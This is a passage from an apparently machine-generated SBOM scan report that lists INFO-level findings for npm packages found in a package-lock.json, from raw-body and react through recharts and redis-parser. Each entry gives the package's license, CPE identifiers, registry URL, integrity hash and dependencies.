- package raw: id: 62bf6c85ca605f5a name: raw-body version: 2.5.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/raw-body@2.5.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz integrity: sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA== dependencies: bytes: ~3.1.2 http-errors: ~2.0.1 iconv-lite: ~0.4.24 unpipe: ~1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aa3b52d55574a475 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react 18.3.1' title: react 18.3.1 description: 'Package discovered: react 18.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 405f6eb700866b5f name: react version: 18.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react@18.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react/-/react-18.3.1.tgz integrity: sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ== dependencies: loose-envify: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 36e9f0b5d3cd995c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react-dom 18.3.1' title: react-dom 18.3.1 description: 'Package discovered: react-dom 18.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 98bcef2cdcc9941a name: react-dom version: 18.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react-dom@18.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz integrity: sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw== dependencies: loose-envify: ^1.1.0 scheduler: ^0.23.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 19cfc2419956329b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react-is 16.13.1' title: react-is 16.13.1 description: 'Package discovered: react-is 16.13.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0db53ea4a0e10790 name: react-is version: 16.13.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react-is@16.13.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz integrity: sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 320c91417fe22e47 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react-is 18.3.1' title: react-is 18.3.1 description: 'Package discovered: react-is 18.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 756017d5bfb89c54 name: react-is version: 18.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react-is@18.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz integrity: sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e00babcb3a543f4c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react-promise-suspense 0.3.4' title: react-promise-suspense 0.3.4 description: 'Package discovered: react-promise-suspense 0.3.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 74a57b2250b339b3 name: react-promise-suspense version: 0.3.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react-promise-suspense@0.3.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz integrity: sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ== dependencies: fast-deep-equal: ^2.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 45e27e6a5bb4b37b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react-smooth 4.0.4' title: react-smooth 4.0.4 description: 'Package discovered: react-smooth 4.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 646f82a1b8ded3b2 name: react-smooth version: 4.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react-smooth@4.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz integrity: sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q== dependencies: fast-equals: ^5.0.1 prop-types: ^15.8.1 react-transition-group: ^4.4.5 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8e8ac167acac7b76 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: react-transition-group 4.4.5' title: react-transition-group 4.4.5 description: 'Package discovered: react-transition-group 4.4.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 15c7effc6183b848 name: react-transition-group version: 4.4.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/react-transition-group@4.4.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz integrity: sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g== dependencies: '@babel/runtime': ^7.5.5 dom-helpers: ^5.0.1 loose-envify: ^1.4.0 prop-types: ^15.6.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0cce3cd1fd3c13cf ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: read-cache 1.0.0' title: read-cache 1.0.0 description: 'Package discovered: read-cache 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5f64d7de79050a02 name: read-cache version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/read-cache@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz integrity: sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA== dependencies: pify: ^2.3.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c7ae55737c4393af ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: readable-stream 2.3.8' title: readable-stream 2.3.8 description: 'Package discovered: readable-stream 2.3.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: deca1a198ab80d23 name: readable-stream version: 2.3.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/readable-stream@2.3.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz integrity: sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA== dependencies: core-util-is: ~1.0.0 inherits: ~2.0.3 isarray: ~1.0.0 process-nextick-args: ~2.0.0 safe-buffer: ~5.1.1 string_decoder: ~1.1.1 util-deprecate: ~1.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 303fe49ee8d1f69a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: readable-stream 3.6.2' title: readable-stream 3.6.2 description: 'Package discovered: readable-stream 3.6.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 066e44c97461677f name: readable-stream version: 3.6.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/readable-stream@3.6.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz integrity: sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA== dependencies: inherits: ^2.0.3 string_decoder: ^1.1.1 util-deprecate: ^1.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9230ea38673dd70b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: readdirp 3.6.0' title: readdirp 3.6.0 description: 'Package discovered: readdirp 3.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: beb5f9a5d33de00e name: readdirp version: 3.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/readdirp@3.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA== dependencies: picomatch: ^2.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ec316d1c56cfd200 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: recharts 2.15.4' title: recharts 2.15.4 description: 'Package discovered: recharts 2.15.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 98e64f0b2bbef0ce name: recharts version: 2.15.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/recharts@2.15.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz integrity: sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw== dependencies: clsx: ^2.0.0 eventemitter3: ^4.0.1 lodash: ^4.17.21 react-is: ^18.3.1 react-smooth: ^4.0.4 recharts-scale: ^0.4.4 tiny-invariant: ^1.3.1 victory-vendor: ^36.6.8 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 249969671e277623 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: recharts-scale 0.4.5' title: recharts-scale 0.4.5 description: 'Package discovered: recharts-scale 0.4.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b982e93a08325fbd name: recharts-scale version: 0.4.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/recharts-scale@0.4.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz integrity: sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w== dependencies: decimal.js-light: ^2.4.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0c07927a54487fe7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: redis-errors 1.2.0' title: redis-errors 1.2.0 description: 'Package discovered: redis-errors 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c6c6f81fb8ed6f43 name: redis-errors version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/redis-errors@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz integrity: sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 38d5b601f3f165a4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: redis-parser 3.0.0' title: redis-parser 3.0.0 description: 'Package discovered: redis-parser 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d5b8e01dbe4fdde4 name: redis-parser version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: 